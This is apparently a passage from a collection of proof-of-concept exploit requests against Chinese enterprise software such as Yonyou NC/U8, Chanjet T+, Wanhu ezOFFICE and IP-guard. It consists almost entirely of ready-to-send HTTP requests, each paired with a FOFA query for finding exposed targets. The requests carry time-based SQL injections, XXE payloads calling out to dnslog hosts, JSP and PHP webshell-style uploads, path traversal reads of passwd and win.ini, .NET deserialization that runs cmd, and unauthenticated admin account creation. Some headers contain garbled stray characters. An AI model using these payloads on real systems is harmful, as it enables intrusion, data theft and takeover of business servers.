User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE: p/ H0 H6 h# g, H$ _
FOFA:app="用友-U8-Cloud"
: Q1 `8 _( Q% r' _4 aPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
" W% y3 [, F9 B# D6 rHost: 192.168.40.131:8088) h$ o$ ^& g$ g" Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.252 @; l( `/ e% b" N: G3 ]0 S
Content-Length: 260
2 B# ^2 J0 B; y- iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
9 n1 R4 z7 A4 \, p* @1 x) HAccept-Encoding: gzip, deflate
, e6 s) @# R/ j6 J" n4 G# }) N) y4 GAccept-Language: zh-CN,zh;q=0.9: i) X$ [) h* N  I" q3 `% z0 h
Connection: close/ ~+ y- q+ X! g  u! B2 c9 P9 f
Content-Type: application/x-www-form-urlencoded
' s9 u+ W+ R/ c) W3 X! b3 Q: L6 ^3 P, `' ]  v8 e9 ~
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
" T/ y7 @9 Y. z% K$ p- \2 B% U8 U$ H. F; C9 i8 s8 h

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the Cookie obtained, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, which confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter its path, and the fileType parameter its file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
